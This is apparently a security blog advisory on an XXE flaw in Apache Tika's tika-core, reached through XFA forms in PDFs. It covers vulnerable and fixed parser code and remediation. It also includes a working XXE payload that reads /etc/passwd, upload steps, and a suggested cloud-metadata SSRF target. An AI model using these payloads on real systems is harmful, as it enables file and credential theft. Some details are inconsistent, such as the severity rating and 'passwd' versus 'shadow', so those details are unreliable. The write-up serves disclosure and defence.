Feb 10, 2026·6 min read·5 visits
Critical XXE in Apache Tika (tika-core < 3.2.2). Attackers can embed malicious XML payloads inside PDF XFA forms. When Tika parses the PDF to extract metadata or text, the XML payload triggers, allowing file read (LFI) or network requests (SSRF). Upgrade `tika-core` immediately.
Apache Tika, the ubiquitously trusted content analysis toolkit, suffers from a critical XML External Entity (XXE) vulnerability within its core library. Specifically affecting how Tika handles XFA (XML Forms Architecture) data embedded within PDF files, this flaw allows attackers to exfiltrate local files or perform Server-Side Request Forgery (SSRF) simply by submitting a malicious document. This is a scope expansion of the earlier CVE-2025-54988, revealing that the rot wasn't just in the PDF module, but deep in `tika-core`.
Apache Tika is the silent workhorse of the enterprise world. It is the library that powers Solr, Elasticsearch, and thousands of corporate Content Management Systems (CMS). Its job is simple but thankless: take a binary blob—be it a Word doc, a PDF, or an image—and extract the text and metadata. It is the "universal translator" of file formats.
But here is the problem with being a universal translator: you have to speak everyone's language, even the dangerous ones. And no language is quite as dangerous in the Java ecosystem as XML. Tika is designed to trust input, parse it, and return structured data. When you feed it a PDF, Tika doesn't just read the text; it looks for forms, metadata, and embedded objects.
This vulnerability exploits a specific feature in PDFs called XFA (XML Forms Architecture). XFA is essentially a way to embed a dynamic XML document inside a static PDF. If Tika blindly passes that embedded XML to a parser that hasn't been strictly disciplined, you get XXE. And in this case, the disciplinarian—tika-core—was asleep at the wheel.
To understand this bug, you have to appreciate the comedy of errors that is XML parsing in Java. By default, Java XML parsers are often promiscuous—they will happily resolve external entities defined in a DTD (Document Type Definition). This allows an XML file to say, "Hey, before you parse me, go fetch the contents of /etc/passwd and stick it in this variable."
This vulnerability is actually the "Director's Cut" of a previous bug, CVE-2025-54988. Originally, developers thought the issue was isolated to the tika-pdf-module. They patched it there. But as security researchers dug deeper, they realized the rot went further down. The unsafe XML configuration wasn't just in the PDF handling logic; it was in the tika-core utility that the PDF module relied on.
This means if you updated your PDF parser but left tika-core on an older version, you were still vulnerable. It’s like locking your front door (the PDF module) but realizing your house frame (the Core) is made of cheese. The specific failure was in not setting the XMLConstants.FEATURE_SECURE_PROCESSING correctly or, more likely, failing to explicitly disable DOCTYPE declarations when processing the extracted XFA stream.
Let's look at what typically goes wrong in these scenarios. In Java, instantiating a SAXParserFactory or DocumentBuilderFactory looks innocent enough, but it's a loaded gun if you don't toggle the safety catch.
The Vulnerable Pattern (Conceptual):
// Inside tika-core logic handling XFA
SAXParserFactory factory = SAXParserFactory.newInstance();
factory.setNamespaceAware(true);
// Missing: The lines that tell the parser to ignore DTDs
SAXParser parser = factory.newSAXParser();
parser.parse(xfaInputStream, handler);When Tika encounters a PDF with XFA data, it extracts the XML stream and feeds it to this parser. Because the disallow-doctype-decl feature isn't set, the parser obeys the attacker's DTD.
The Fix (Apache Tika 3.2.2):
The remediation involves rigorously locking down the parser factory in tika-core. The patch ensures that any XML parsing initiated by this utility explicitly forbids external entities.
// The Hardened Configuration
SAXParserFactory factory = SAXParserFactory.newInstance();
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
// The critical line that kills XXE dead:
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);This change in tika-core propagates safety to all modules consuming these utilities, finally closing the hole that the previous CVE missed.
Exploiting this requires a bit of "Inception." We aren't sending an XML file directly; we are wrapping an XML payload inside a PDF envelope. The target (Tika) will unwrap it for us.
Step 1: The Container
We create a valid PDF structure. Inside the PDF Catalog, we define an /AcroForm dictionary that references an /XFA stream. This tells the PDF reader (or parser), "Hey, the form data for this document is stored in this XML blob."
Step 2: The Payload Inside that XFA stream, we inject the classic XXE payload. Here is a simplified view of the malicious object structure:
5 0 obj
<< /XFA 6 0 R >> % Reference to the XML stream
endobj
6 0 obj
<< /Length 123 >>
stream
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xdp:xdp [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<template>
<field name="stealing_your_data">
<value><text>&xxe;</text></value>
</field>
</template>
</xdp:xdp>
endstream
endobjStep 3: The Trigger
We upload this PDF to a Tika endpoint (e.g., PUT /tika). Tika accepts the PDF, parses the structure, finds the XFA stream, and passes it to its XML parser. The parser sees &xxe;, resolves it to the contents of /etc/passwd, and places that text into the <value> field.
Step 4: The Exfiltration Tika then returns the "text content" of the PDF to the user (or logs it, or indexes it). The attacker simply reads the response body, and there, amidst the PDF metadata, is the content of the shadow file.
An XXE in a library like Tika is catastrophic because of where Tika lives. It is rarely sitting on a user's laptop; it is usually deployed in the backend of massive data pipelines.
1. Cloud Metadata Theft (SSRF):
If Tika is running in AWS, GCP, or Azure, an attacker doesn't care about /etc/passwd. They will change the entity to http://169.254.169.254/latest/meta-data/iam/security-credentials/. Now they have your IAM keys. They own your bucket.
2. Denial of Service (Billion Laughs): Even if data exfiltration is blocked, an attacker can use the "Billion Laughs" attack (recursive entity expansion) to consume all memory on the Tika server, crashing the indexing pipeline for the entire organization.
3. Internal Network Scanning: Blind XXE can be used to scan internal ports. The Tika server acts as a proxy, allowing an external attacker to probe the internal network for open services (Redis, Elastic, etc.).
This is a mandatory update. You cannot configure your way out of this easily without recompiling code.
Immediate Action:
Update your dependencies. You need tika-core version 3.2.2 or higher. If you are using a build tool like Maven, check your dependency tree (mvn dependency:tree). You might have updated tika-parsers but still be pulling in an old tika-core transitively. Explicitly force the version:
<dependency>
<groupId>org.apache.tika</groupId>
<artifactId>tika-core</artifactId>
<version>3.2.2</version>
</dependency>Legacy Users (1.x branch):
The 1.x branch is End-of-Life (EOL) but widely used. The tika-parsers module in 1.x is vulnerable. There is no official fix for 1.x. You must migrate to the 3.x branch. If you cannot migrate, you are sitting on a time bomb. Your only mitigation is to firewall the Tika service and ensure it cannot make outbound connections, though this does not stop local file theft.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L| Product | Affected Versions | Fixed Version |
|---|---|---|
Apache Tika Core Apache Software Foundation | 1.13 - 3.2.1 | 3.2.2 |
Apache Tika PDF Module Apache Software Foundation | 2.0.0 - 3.2.1 | 3.2.2 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-611 |
| Attack Vector | Network (via File Upload) |
| CVSS | 8.4 (High) |
| EPSS Score | 2.73% (High Percentile) |
| Impact | Information Disclosure / SSRF |
| Exploit Status | PoC Available / Active |
| Patch Status | Fixed in 3.2.2 |
The software processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.